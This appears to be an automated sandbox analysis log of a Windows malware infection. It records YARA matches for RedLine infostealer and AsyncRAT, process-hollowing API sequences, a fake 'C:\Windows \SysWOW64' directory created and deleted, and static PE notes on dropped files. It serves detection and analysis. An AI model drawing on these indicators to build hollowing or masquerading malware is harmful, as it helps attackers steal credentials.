                Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08670 NtUnmapViewOfSection,4_2_02B08670
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08400 NtReadVirtualMemory,4_2_02B08400
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B07A2C NtAllocateVirtualMemory,4_2_02B07A2C
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_02B0DC8C
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02B0DC04
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02B08D70
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_02B0DD70
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B07D78 NtWriteVirtualMemory,4_2_02B07D78
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B07A2A NtAllocateVirtualMemory,4_2_02B07A2A
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02B0DBB0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02B08D6E
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,13_2_00024823
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose,13_2_0002643A
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,13_2_00037460
                Source: C:\Users\Public\alpha.pifCode function: 13_2_000264CA NtQueryInformationToken,13_2_000264CA
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00026500 NtQueryInformationToken,NtQueryInformationToken,13_2_00026500
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003A135 NtSetInformationFile,13_2_0003A135
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,13_2_0003C1FA
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,13_2_00014E3B
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,13_2_00024759
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,17_2_00024823
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose,17_2_0002643A
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,17_2_00037460
                Source: C:\Users\Public\alpha.pifCode function: 17_2_000264CA NtQueryInformationToken,17_2_000264CA
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00026500 NtQueryInformationToken,NtQueryInformationToken,17_2_00026500
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003A135 NtSetInformationFile,17_2_0003A135
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,17_2_0003C1FA
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,17_2_00014E3B
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,17_2_00024759
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C8670 NtUnmapViewOfSection,27_2_029C8670
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C8400 NtReadVirtualMemory,27_2_029C8400
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C7A2C NtAllocateVirtualMemory,27_2_029C7A2C
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C7D78 NtWriteVirtualMemory,27_2_029C7D78
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,27_2_029C8D70
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,27_2_029CDD70
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C86F7 NtUnmapViewOfSection,27_2_029C86F7
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C7AC9 NtAllocateVirtualMemory,27_2_029C7AC9
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C7A2A NtAllocateVirtualMemory,27_2_029C7A2A
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029CDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,27_2_029CDBB0
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029CDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,27_2_029CDC8C
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029CDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,27_2_029CDC04
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,27_2_029C8D6E
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E8670 NtUnmapViewOfSection,36_2_029E8670
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E8400 NtReadVirtualMemory,36_2_029E8400
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E7A2C NtAllocateVirtualMemory,36_2_029E7A2C
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E7D78 NtWriteVirtualMemory,36_2_029E7D78
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,36_2_029E8D70
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029EDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,36_2_029EDD70
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E86F7 NtUnmapViewOfSection,36_2_029E86F7
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E7AC9 NtAllocateVirtualMemory,36_2_029E7AC9
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E7A2A NtAllocateVirtualMemory,36_2_029E7A2A
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029EDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,36_2_029EDBB0
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029EDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,36_2_029EDC8C
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029EDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,36_2_029EDC04
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,36_2_029E8D6E
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00014C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,13_2_00014C10
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08788 CreateProcessAsUserW,4_2_02B08788
                Source: C:\Users\Public\alpha.pifFile created: C:\Windows
                Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64
                Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin
                Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF20C44_2_02AF20C4
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFC98E4_2_02AFC98E
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFC9DE4_2_02AFC9DE
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00408C6012_1_00408C60
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040DC1112_1_0040DC11
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00407C3F12_1_00407C3F
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00418CCC12_1_00418CCC
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00406CA012_1_00406CA0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004028B012_1_004028B0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0041A4BE12_1_0041A4BE
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0041824412_1_00418244
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0040165012_1_00401650
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00402F2012_1_00402F20
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004193C412_1_004193C4
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_0041878812_1_00418788
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00402F8912_1_00402F89
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_00402B9012_1_00402B90
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004073A012_1_004073A0
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0001540A13_2_0001540A
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00014C1013_2_00014C10
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0002487513_2_00024875
                Source: C:\Users\Public\alpha.pifCode function: 13_2_000174B113_2_000174B1
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0001914413_2_00019144
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003695A13_2_0003695A
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003419113_2_00034191
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0001EE0313_2_0001EE03
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00017A3413_2_00017A34
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00016E5713_2_00016E57
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0001D66013_2_0001D660
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00033E6613_2_00033E66
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00025A8613_2_00025A86
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003769E13_2_0003769E
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00023EB313_2_00023EB3
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00024EC113_2_00024EC1
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00016B2013_2_00016B20
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0002074013_2_00020740
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00020BF013_2_00020BF0
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0001540A17_2_0001540A
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00014C1017_2_00014C10
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0002487517_2_00024875
                Source: C:\Users\Public\alpha.pifCode function: 17_2_000174B117_2_000174B1
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0001914417_2_00019144
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003695A17_2_0003695A
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003419117_2_00034191
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0001EE0317_2_0001EE03
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00017A3417_2_00017A34
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00016E5717_2_00016E57
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0001D66017_2_0001D660
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00033E6617_2_00033E66
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00025A8617_2_00025A86
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003769E17_2_0003769E
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00023EB317_2_00023EB3
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00024EC117_2_00024EC1
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00016B2017_2_00016B20
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0002074017_2_00020740
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00020BF017_2_00020BF0
                Source: C:\Users\Public\xpha.pifCode function: 18_2_00891E2618_2_00891E26
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_0074A81022_2_0074A810
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_00727C0022_2_00727C00
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_00752D4022_2_00752D40
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_007279F022_2_007279F0
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_0074EEB022_2_0074EEB0
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_007492A022_2_007492A0
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_007493B022_2_007493B0
                Source: C:\Windows\System32\FXSSVC.exeCode function: 25_2_0096A81025_2_0096A810
                Source: C:\Windows\System32\FXSSVC.exeCode function: 25_2_00947C0025_2_00947C00
                Source: C:\Windows\System32\FXSSVC.exeCode function: 25_2_009479F025_2_009479F0
                Source: C:\Windows\System32\FXSSVC.exeCode function: 25_2_00972D4025_2_00972D40
                Source: C:\Windows\System32\FXSSVC.exeCode function: 25_2_0096EEB025_2_0096EEB0
                Source: C:\Windows\System32\FXSSVC.exeCode function: 25_2_009692A025_2_009692A0
                Source: C:\Windows\System32\FXSSVC.exeCode function: 25_2_009693B025_2_009693B0
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029B20C427_2_029B20C4
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 28_2_022B92A028_2_022B92A0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 28_2_022BEEB028_2_022BEEB0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 28_2_022B93B028_2_022B93B0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 28_2_02297C0028_2_02297C00
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 28_2_022BA81028_2_022BA810
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 28_2_022C2D4028_2_022C2D40
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 28_2_022979F028_2_022979F0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00408C6030_2_00408C60
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0040DC1130_2_0040DC11
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00407C3F30_2_00407C3F
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00418CCC30_2_00418CCC
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00406CA030_2_00406CA0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_004028B030_2_004028B0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0041A4BE30_2_0041A4BE
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0041824430_2_00418244
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0040165030_2_00401650
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00402F2030_2_00402F20
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_004193C430_2_004193C4
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_0041878830_2_00418788
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00402F8930_2_00402F89
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_00402B9030_2_00402B90
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_004073A030_2_004073A0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_1004515C30_2_1004515C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_1003598030_2_10035980
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10006EAF30_2_10006EAF
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_100439A330_2_100439A3
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_100051EE30_2_100051EE
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_1003D58030_2_1003D580
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_10007F8030_2_10007F80
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_1003378030_2_10033780
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_1003C7F030_2_1003C7F0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_2681102130_2_26811021
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_2681103030_2_26811030
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00408C6030_1_00408C60
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0040DC1130_1_0040DC11
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00407C3F30_1_00407C3F
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00418CCC30_1_00418CCC
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00406CA030_1_00406CA0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_004028B030_1_004028B0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0041A4BE30_1_0041A4BE
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0041824430_1_00418244
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0040165030_1_00401650
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00402F2030_1_00402F20
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_004193C430_1_004193C4
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_0041878830_1_00418788
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00402F8930_1_00402F89
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_00402B9030_1_00402B90
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_1_004073A030_1_004073A0
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029D20C436_2_029D20C4
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02AF44DC appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B089D0 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02AF4500 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02AF4860 appears 949 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B0894C appears 56 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02AF46D4 appears 244 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029D4860 appears 683 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029E894C appears 50 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029D46D4 appears 155 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029B4860 appears 683 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029B46D4 appears 155 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029C894C appears 50 times
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: String function: 0040D606 appears 72 times
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: String function: 0040E1D8 appears 129 times
                Source: Acrobat.exe.12.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                Source: chrmstp.exe.12.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                Source: chrmstp.exe.12.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                Source: setup.exe0.12.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                Source: setup.exe0.12.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
                Source: ie_to_edge_stub.exe.12.drStatic PE information: Number of sections : 11 > 10
                Source: identity_helper.exe.12.drStatic PE information: Number of sections : 12 > 10
                Source: elevation_service.exe0.12.drStatic PE information: Number of sections : 12 > 10
                Source: chrmstp.exe.12.drStatic PE information: Number of sections : 14 > 10
                Source: elevation_service.exe.12.drStatic PE information: Number of sections : 12 > 10
                Source: msedgewebview2.exe.12.drStatic PE information: Number of sections : 14 > 10
                Source: setup.exe1.12.drStatic PE information: Number of sections : 13 > 10
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: Number of sections : 13 > 10
                Source: setup.exe0.12.drStatic PE information: Number of sections : 14 > 10
                Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
